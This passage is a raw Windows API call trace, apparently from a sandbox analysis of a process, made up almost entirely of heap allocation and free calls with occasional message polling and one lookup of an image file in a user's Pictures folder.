[0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730c8 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0208.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0208.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0208.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0208.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0208.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.801] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0208.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0208.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0208.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0208.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.806] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/6MclNK.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4110030, ftCreationTime.dwHighDateTime=0x1d5d29b, ftLastAccessTime.dwLowDateTime=0x165d7400, ftLastAccessTime.dwHighDateTime=0x1d5cb16, ftLastWriteTime.dwLowDateTime=0x165d7400, ftLastWriteTime.dwHighDateTime=0x1d5cb16, nFileSizeHigh=0x0, nFileSizeLow=0x7be6, dwReserved0=0x0, dwReserved1=0x0, cFileName="6MclNK.gif", cAlternateFileName="")) returned 0x9e2078 [0208.806] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0208.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0208.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 